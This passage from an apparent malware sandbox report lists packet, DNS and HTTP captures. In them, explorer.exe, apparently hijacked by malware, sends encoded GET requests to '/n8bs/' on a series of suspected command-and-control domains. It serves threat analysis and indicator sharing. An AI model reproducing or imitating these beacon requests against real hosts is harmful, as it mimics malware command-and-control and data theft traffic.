Jan 10, 2022 08:55:50.098130941 CET	80	49822	15.197.142.173	192.168.2.3
Jan 10, 2022 08:55:50.098161936 CET	80	49822	15.197.142.173	192.168.2.3
Jan 10, 2022 08:55:50.098385096 CET	49822	80	192.168.2.3	15.197.142.173
Jan 10, 2022 08:55:50.098511934 CET	49822	80	192.168.2.3	15.197.142.173
Jan 10, 2022 08:55:50.116934061 CET	80	49822	15.197.142.173	192.168.2.3
Jan 10, 2022 08:55:55.267420053 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.443290949 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.443521023 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.443573952 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.627110004 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.627187967 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.627265930 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.627321959 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.627361059 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.627435923 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.627635956 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.627736092 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:55:55.803679943 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.803719997 CET	80	49823	136.143.191.204	192.168.2.3
Jan 10, 2022 08:55:55.803952932 CET	49823	80	192.168.2.3	136.143.191.204
Jan 10, 2022 08:56:00.748008013 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:00.914479971 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:00.914645910 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:00.914690971 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.080894947 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082258940 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082298040 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082334042 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082370996 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082407951 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082441092 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082472086 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082510948 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.082559109 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.082566023 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.082716942 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082772017 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.082806110 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.082875967 CET	80	49824	162.144.34.39	192.168.2.3
Jan 10, 2022 08:56:01.084467888 CET	49824	80	192.168.2.3	162.144.34.39
Jan 10, 2022 08:56:01.458599091 CET	49824	80	192.168.2.3	162.144.34.39

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2022 08:55:23.217032909 CET	52650	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:23.263547897 CET	53	52650	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:28.343866110 CET	63297	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:28.364706993 CET	53	63297	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:33.443391085 CET	58361	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:33.466032028 CET	53	58361	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:38.533545971 CET	50728	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:38.657543898 CET	53	50728	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:44.326755047 CET	53777	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:44.478153944 CET	53	53777	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:49.858814955 CET	57106	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:49.881380081 CET	53	57106	8.8.8.8	192.168.2.3
Jan 10, 2022 08:55:55.135059118 CET	60352	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:55:55.265640974 CET	53	60352	8.8.8.8	192.168.2.3
Jan 10, 2022 08:56:00.639985085 CET	56773	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:56:00.746961117 CET	53	56773	8.8.8.8	192.168.2.3
Jan 10, 2022 08:56:06.466335058 CET	60982	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:56:06.487317085 CET	53	60982	8.8.8.8	192.168.2.3
Jan 10, 2022 08:56:11.634263992 CET	58058	53	192.168.2.3	8.8.8.8
Jan 10, 2022 08:56:11.673597097 CET	53	58058	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 10, 2022 08:55:23.217032909 CET	192.168.2.3	8.8.8.8	0x15ed	Standard query (0)	www.zahad-riedel.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:28.343866110 CET	192.168.2.3	8.8.8.8	0x2969	Standard query (0)	www.jypmore.quest	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:33.443391085 CET	192.168.2.3	8.8.8.8	0x822	Standard query (0)	www.mermadekusse.store	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:38.533545971 CET	192.168.2.3	8.8.8.8	0xee23	Standard query (0)	www.indianasheriffs.biz	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:44.326755047 CET	192.168.2.3	8.8.8.8	0xe641	Standard query (0)	www.eduardoleonsilva.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:49.858814955 CET	192.168.2.3	8.8.8.8	0xf8a6	Standard query (0)	www.thetanheroes.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:55.135059118 CET	192.168.2.3	8.8.8.8	0x277b	Standard query (0)	www.pinnaclecorporaterentals.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:00.639985085 CET	192.168.2.3	8.8.8.8	0x3e90	Standard query (0)	www.myveguiolcusbyopappgroup.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:06.466335058 CET	192.168.2.3	8.8.8.8	0x35b	Standard query (0)	www.payperlivecalls.com	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:11.634263992 CET	192.168.2.3	8.8.8.8	0xdf5e	Standard query (0)	www.afgelocal2741.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 10, 2022 08:55:23.263547897 CET	8.8.8.8	192.168.2.3	0x15ed	No error (0)	www.zahad-riedel.com		185.30.32.154	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:28.364706993 CET	8.8.8.8	192.168.2.3	0x2969	No error (0)	www.jypmore.quest		37.123.118.150	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:33.466032028 CET	8.8.8.8	192.168.2.3	0x822	Name error (3)	www.mermadekusse.store	none	none	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:38.657543898 CET	8.8.8.8	192.168.2.3	0xee23	No error (0)	www.indianasheriffs.biz		208.91.197.39	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:44.478153944 CET	8.8.8.8	192.168.2.3	0xe641	No error (0)	www.eduardoleonsilva.com	eduardoleonsilva.com		CNAME (Canonical name)	IN (0x0001)
Jan 10, 2022 08:55:44.478153944 CET	8.8.8.8	192.168.2.3	0xe641	No error (0)	eduardoleonsilva.com		162.241.2.141	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:49.881380081 CET	8.8.8.8	192.168.2.3	0xf8a6	No error (0)	www.thetanheroes.com	thetanheroes.com		CNAME (Canonical name)	IN (0x0001)
Jan 10, 2022 08:55:49.881380081 CET	8.8.8.8	192.168.2.3	0xf8a6	No error (0)	thetanheroes.com		15.197.142.173	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:49.881380081 CET	8.8.8.8	192.168.2.3	0xf8a6	No error (0)	thetanheroes.com		3.33.152.147	A (IP address)	IN (0x0001)
Jan 10, 2022 08:55:55.265640974 CET	8.8.8.8	192.168.2.3	0x277b	No error (0)	www.pinnaclecorporaterentals.com	zhs.zohosites.com		CNAME (Canonical name)	IN (0x0001)
Jan 10, 2022 08:55:55.265640974 CET	8.8.8.8	192.168.2.3	0x277b	No error (0)	zhs.zohosites.com		136.143.191.204	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:00.746961117 CET	8.8.8.8	192.168.2.3	0x3e90	No error (0)	www.myveguiolcusbyopappgroup.com		162.144.34.39	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:06.487317085 CET	8.8.8.8	192.168.2.3	0x35b	No error (0)	www.payperlivecalls.com	payperlivecalls.com		CNAME (Canonical name)	IN (0x0001)
Jan 10, 2022 08:56:06.487317085 CET	8.8.8.8	192.168.2.3	0x35b	No error (0)	payperlivecalls.com		34.102.136.180	A (IP address)	IN (0x0001)
Jan 10, 2022 08:56:11.673597097 CET	8.8.8.8	192.168.2.3	0xdf5e	Name error (3)	www.afgelocal2741.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.zahad-riedel.com

www.jypmore.quest

www.indianasheriffs.biz

www.eduardoleonsilva.com

www.thetanheroes.com

www.pinnaclecorporaterentals.com

www.myveguiolcusbyopappgroup.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49805	185.30.32.154	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:23.302856922 CET	10650	OUT	GET /n8bs/?4hJLWJ=iaKVfi2UNf7U4ghXoaW8pCxH8k1QKwprWVQ4tf6BluLH39GjhhtZKTymn1Siq8RobrxN&Mtx=0PvL86-xjV HTTP/1.1 Host: www.zahad-riedel.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:55:23.326754093 CET	10650	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 10 Jan 2022 07:55:23 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 196 Connection: close Vary: Accept-Encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49818	37.123.118.150	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:28.395068884 CET	10680	OUT	GET /n8bs/?4hJLWJ=7H0yjhDg+a+MHwvOt9FlC9FT4fPPwk985azmZpRe8o0S6swRDJgGtBdFue+HEp9ACtz2&Mtx=0PvL86-xjV HTTP/1.1 Host: www.jypmore.quest Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:55:28.423782110 CET	10681	IN	HTTP/1.1 403 Forbidden Server: nginx/1.10.3 (Ubuntu) Date: Mon, 10 Jan 2022 07:55:28 GMT Content-Type: text/html Content-Length: 178 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49820	208.91.197.39	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:38.802405119 CET	10690	OUT	GET /n8bs/?4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les/exvmn3T3lrgLyL2qaFXU4A/SjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV HTTP/1.1 Host: www.indianasheriffs.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:55:39.013601065 CET	10692	IN	HTTP/1.1 200 OK Date: Mon, 10 Jan 2022 07:55:38 GMT Server: Apache Set-Cookie: vsid=928vr3893469388808727; expires=Sat, 09-Jan-2027 07:55:38 GMT; Max-Age=157680000; path=/; domain=www.indianasheriffs.biz; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_YAOoyR7jsweepZxkbpeQgJUs6zz8K/MbebdAWWC5QYFh2gt8Y8IgpJYiHaEOvCcah73lUfCgY5dvzaBUWNDGHw== Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 36 34 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 59 41 4f 6f 79 52 37 6a 73 77 65 65 70 5a 78 6b 62 70 65 51 67 4a 55 73 36 7a 7a 38 4b 2f 4d 62 65 62 64 41 57 57 43 35 51 59 46 68 32 67 74 38 59 38 49 67 70 4a 59 69 48 61 45 4f 76 43 63 61 68 37 33 6c 55 66 43 67 59 35 64 76 7a 61 42 55 57 4e 44 47 48 77 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 6e 61 73 68 65 72 69 66 66 73 2e 62 69 7a 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 6e 61 73 68 65 72 69 66 66 73 2e 62 69 7a 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 Data Ascii: 64e3<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_YAOoyR7jsweepZxkbpeQgJUs6zz8K/MbebdAWWC5QYFh2gt8Y8IgpJYiHaEOvCcah73lUfCgY5dvzaBUWNDGHw=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.indianasheriffs.biz/px.js?ch=1"></script><script type="text/javascript" src="http://www.indianasheriffs.biz/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0p
Jan 10, 2022 08:55:39.013655901 CET	10693	IN	Data Raw: 78 22 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 64 69 61 6e 61 73 68 65 72 69 66 66 73 2e 62 69 7a 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 Data Ascii: x";imglog.style.width="0px";imglog.src="http://www.indianasheriffs.biz/sk-logabpstatus.php?a=dWk1S2FMWm05ZFFqQU1pdjdvVVB2dEx3RFk1ZGRsMzBMekJWeTk0ek1sV0VTY0FETjZCK2xPVEVnelhORU8xRDMxeUFjRWtlcEpFSjFqdVc2dXFZUXNqaWtpOURBdTVSYW82UHAvTkFLajlvUVFNUV
Jan 10, 2022 08:55:39.013694048 CET	10695	IN	Data Raw: 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 70 69 63 73 2f 38 39 33 32 2f 61 72 72 6f 77 73 2e 6a 70 67 29 7d 2a 2f 0d 0a 23 6d 61 69 6e 2d 77 72 61 70 7b 2f 2a 62 61 63 6b 67 72 6f 75 6e 64 3a 75 Data Ascii: p://i4.cdn-image.com/__media__/pics/8932/arrows.jpg)}/#main-wrap{/background:url(http://i4.cdn-image.com/__media__/pics/7985/headerstrip.gif) top center repeat-x;*/ background-size:100% 100px}#header { margin: 0px;}#header .h
Jan 10, 2022 08:55:39.013732910 CET	10696	IN	Data Raw: 64 74 68 3a 39 36 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 0d 0a 2e 68 65 61 64 65 72 7b 68 65 69 67 68 74 3a 39 30 70 78 3b 20 7d 0d 0a 2e 6c 65 66 74 62 6c 6b 7b 66 6c 6f 61 74 3a 6c 65 66 74 3b 20 6f 76 65 72 66 6c 6f 77 3a 68 Data Ascii: dth:960px; margin:0 auto}.header{height:90px; }.leftblk{float:left; overflow:hidden}.leftblk img{float: left; margin-top:22px; *margin-top:18px; padding-right: 15px;}.domain_name{float:left; line-height:100px; font-size:26px; font-weig
Jan 10, 2022 08:55:39.013772011 CET	10697	IN	Data Raw: 69 61 5f 5f 2f 70 69 63 73 2f 38 39 33 34 2f 6c 73 74 5f 61 72 72 2e 6a 70 67 29 20 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 77 69 64 74 68 3a 32 38 36 70 78 3b 20 68 65 69 67 68 74 3a 34 32 35 70 78 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 Data Ascii: ia__/pics/8934/lst_arr.jpg) ;float:left;width:286px; height:425px; background-position:-2px 33px; background-repeat:no-repeat}.kwd_bloack{float:left; width:388px; margin-top:50px}.kwd_bloack h4{font-size:13px; line-height:18px; color:#8a88
Jan 10, 2022 08:55:39.013813019 CET	10699	IN	Data Raw: 6c 6f 72 3a 23 63 30 63 30 63 30 3b 7d 0d 0a 2e 66 6f 6f 74 65 72 2d 6e 61 76 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 37 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 63 30 63 30 63 30 3b 20 20 70 61 64 Data Ascii: lor:#c0c0c0;}.footer-nav a{font-size:12px; line-height:74px; color:#c0c0c0; padding: 0 5px; text-decoration:underline}.footer-nav a:hover{text-decoration: none}/*.inquire {text-align:right; padding-top:10px; color:#fff}.inquire a {f
Jan 10, 2022 08:55:39.013851881 CET	10700	IN	Data Raw: 69 64 74 68 3a 20 61 75 74 6f 3b 7d 0d 0a 0d 0a 0d 0a 2e 61 72 72 6f 77 73 20 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 32 37 70 78 20 37 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 38 38 25 20 61 75 74 Data Ascii: idth: auto;}.arrows {background-position: 27px 70px;background-size: 88% auto;}/* #main-wrap{background-size:100% 237px} .container{width:100%} .header, .bottom_rs ul{height:auto} .leftblk{float:none; padding
Jan 10, 2022 08:55:39.129139900 CET	10701	IN	Data Raw: 74 6f 3b 7d 0d 0a 0d 0a 23 68 65 61 64 65 72 20 68 31 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 7d 0d 0a 0d 0a 7d 0d 0a 0d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 20 Data Ascii: to;}#header h1 a{font-size: 28px;}}@media only screen and (max-width : 600px) {#header{text-align: center;}#header .headTop .rightBlock{float: none;}#header h1 a{font-size: 22px;}#header .leftBlock p a{display: inline-bloc
Jan 10, 2022 08:55:39.155929089 CET	10703	IN	Data Raw: 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 20 20 20 20 20 20 20 20 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 62 6f 74 74 6f 6d 22 3e 0d 0a 20 3c 64 69 76 Data Ascii: </div> </div> </div> <div class="headbottom"> <div class="container clearfix"> <div class="head-pad"> <h1><a href="http://www.Indianasheriffs.biz">Indianasheriffs.biz</a> <span class="wh
Jan 10, 2022 08:55:39.155971050 CET	10704	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 34 3e 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 65 6c 61 74 65 64 2d 73 65 61 72 63 68 65 73 2d 63 75 73 74 6f 6d 22 3e 52 65 6c 61 74 65 64 20 53 65 61 72 63 68 65 73 3a 3c 2f 73 70 61 6e 3e Data Ascii: <h4> <span class="related-searches-custom">Related Searches:</span></h4> <ul class="clearfix"> <li><a href="http://www.indianasheriffs.biz/Anti_Wrinkle_Creams.cfm?fp=NpGxw7H6oMg5%2BaTgzk5H
Jan 10, 2022 08:55:39.156121016 CET	10706	IN	Data Raw: 76 74 6f 66 3d 72 59 35 4f 45 75 4c 72 56 68 63 62 58 43 65 35 71 4d 59 55 7a 68 59 73 7a 58 31 6d 76 38 50 4e 6d 33 65 6c 6c 4e 4a 45 72 31 73 25 33 44 26 34 68 4a 4c 57 4a 3d 63 33 6d 6d 74 53 65 66 37 58 45 39 59 36 4c 45 70 71 54 6c 5a 39 6c Data Ascii: vtof=rY5OEuLrVhcbXCe5qMYUzhYszX1mv8PNm3ellNJEr1s%3D&4hJLWJ=c3mmtSef7XE9Y6LEpqTlZ9les%2Fexvmn3T3lrgLyL2qaFXU4A%2FSjORTIHh9BJbvzbz9Lm&Mtx=0PvL86-xjV&&kt=112&&ki=10844596&ktd=0&kld=1061&kp=2" target="_top" onmouseover="changeStatus('find a tutor'

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49821	162.241.2.141	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:44.692188978 CET	10719	OUT	GET /n8bs/?4hJLWJ=dFscc3ADPHmy8TWVKvwCOMwU5bUrQa/CizHl44ZiWA9r2IP2TSl8LSycOCDTN0nOZKJt&Mtx=0PvL86-xjV HTTP/1.1 Host: www.eduardoleonsilva.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 10, 2022 08:55:44.838823080 CET	10719	IN	HTTP/1.1 404 Not Found Date: Mon, 10 Jan 2022 07:55:44 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49822	15.197.142.173	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 10, 2022 08:55:49.900691032 CET	10720	OUT	GET /n8bs/?4hJLWJ=PuetlOwZFpkKGCq/MJJLd9AYausHszI4yXIJtu+5frxDpsbSPvktMbNWt5V8r6CNrXXm&Mtx=0PvL86-xjV HTTP/1.1 Host: www.thetanheroes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
